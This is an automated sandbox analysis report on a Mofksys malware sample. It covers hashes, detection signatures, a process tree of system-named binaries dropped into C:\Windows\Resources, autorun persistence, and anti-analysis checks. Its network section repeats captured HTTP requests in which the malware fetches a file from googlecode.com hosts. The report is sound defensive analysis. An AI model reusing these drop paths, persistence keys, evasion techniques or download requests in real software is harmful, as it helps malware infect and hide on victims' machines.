Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522734
MD5:35d43833c8e14f030d4ea74eda1b8dd5
SHA1:83b0795b3ff05b3346fef4c78cee036529d228b9
SHA256:dd185abc18942717c4a27c59c0eed6713347230ecee9b13085398bdfa64b8479
Tags:exeuser-jstrosch
Infos:

Detection

CryptOne, Mofksys
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Mofksys
Contains functionality to detect sleep reduction / modifications
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Writes to foreign memory regions
Checks for debuggers (devices)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SGDT)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • file.exe (PID: 3596 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 35D43833C8E14F030D4EA74EDA1B8DD5)
    • explorer.exe (PID: 320 cmdline: c:\windows\resources\themes\explorer.exe MD5: 8C38488BD8A8FFF2A635B644BEB61C1E)
      • spoolsv.exe (PID: 6204 cmdline: c:\windows\resources\spoolsv.exe SE MD5: 6375F300DFDCF48B2502987709E35C1C)
        • svchost.exe (PID: 1600 cmdline: c:\windows\resources\svchost.exe MD5: 789AC0C78808EADDAABA13B1F71F4947)
          • spoolsv.exe (PID: 4592 cmdline: c:\windows\resources\spoolsv.exe PR MD5: 6375F300DFDCF48B2502987709E35C1C)
  • explorer.exe (PID: 3116 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 8C38488BD8A8FFF2A635B644BEB61C1E)
  • svchost.exe (PID: 5152 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • explorer.exe (PID: 6208 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 8C38488BD8A8FFF2A635B644BEB61C1E)
    • consent.exe (PID: 6020 cmdline: consent.exe 5152 322 0000013E5E228840 MD5: DD5032EF160209E470E2612A8A3D5F59)
    • svchost.exe (PID: 4708 cmdline: "C:\windows\resources\svchost.exe" RO MD5: 789AC0C78808EADDAABA13B1F71F4947)
  • svchost.exe (PID: 1012 cmdline: "C:\windows\resources\svchost.exe" RO MD5: 789AC0C78808EADDAABA13B1F71F4947)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000003.2132597386.0000000002BC0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000004.00000003.2113766529.0000000003140000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000A.00000003.2282489300.0000000002CA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
          00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            2.3.explorer.exe.2e784a0.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              5.3.spoolsv.exe.2cb84a0.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                3.3.spoolsv.exe.2f084a0.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  0.2.file.exe.421000.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    0.3.file.exe.2f984a0.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 24 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 3596, TargetFilename: c:\windows\resources\themes\explorer.exe
                      Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 6204, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 1600, ProcessName: svchost.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\resources\themes\explorer.exe, CommandLine: c:\windows\resources\themes\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\explorer.exe, NewProcessName: C:\Windows\Resources\Themes\explorer.exe, OriginalFileName: C:\Windows\Resources\Themes\explorer.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 3596, ParentProcessName: file.exe, ProcessCommandLine: c:\windows\resources\themes\explorer.exe, ProcessId: 320, ProcessName: explorer.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 6204, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 1600, ProcessName: svchost.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\resources\themes\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\Resources\svchost.exe, ProcessId: 1600, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer
                      Source: Process startedAuthor: vburov: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 6204, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 1600, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeAvira: detected
                      Source: C:\Windows\Resources\svchost.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                      Source: C:\Windows\Resources\Themes\explorer.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                      Source: C:\Windows\Resources\spoolsv.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                      Source: file.exeReversingLabs: Detection: 73%
                      Source: C:\Windows\Resources\svchost.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Resources\Themes\explorer.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Resources\spoolsv.exeJoe Sandbox ML: detected
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E66F8 EP_CryptHashBuffer,0_2_004E66F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1864 EP_CryptEncryptBuffer,0_2_004E1864
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E6820 EP_CryptHashFileA,0_2_004E6820
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E18F8 EP_CryptDecryptBuffer,0_2_004E18F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E68B4 EP_CryptHashFileW,0_2_004E68B4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E18B4 EP_CryptEncryptBufferEx,0_2_004E18B4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E694C EP_CryptHashStringA,0_2_004E694C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1948 EP_CryptDecryptBufferEx,0_2_004E1948
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E6970 EP_CryptHashStringW,0_2_004E6970
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E66F8 EP_CryptHashBuffer,3_2_004E66F8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E1864 EP_CryptEncryptBuffer,3_2_004E1864
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E6820 EP_CryptHashFileA,3_2_004E6820
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E18F8 EP_CryptDecryptBuffer,3_2_004E18F8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E68B4 EP_CryptHashFileW,3_2_004E68B4
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E18B4 EP_CryptEncryptBufferEx,3_2_004E18B4
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E694C EP_CryptHashStringA,3_2_004E694C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E1948 EP_CryptDecryptBufferEx,3_2_004E1948
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E6970 EP_CryptHashStringW,3_2_004E6970
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

                      Spreading

                      barindex
                      Source: Yara matchFile source: 10.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2169309024.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2381560124.0000000000401000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2309973257.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2170519310.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 3596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 6204, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 4592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6208, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4708, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042806E GetLogicalDriveStringsW,0_2_0042806E

                      Networking

                      barindex
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 108.177.15.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 74.125.206.82 80Jump to behavior
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
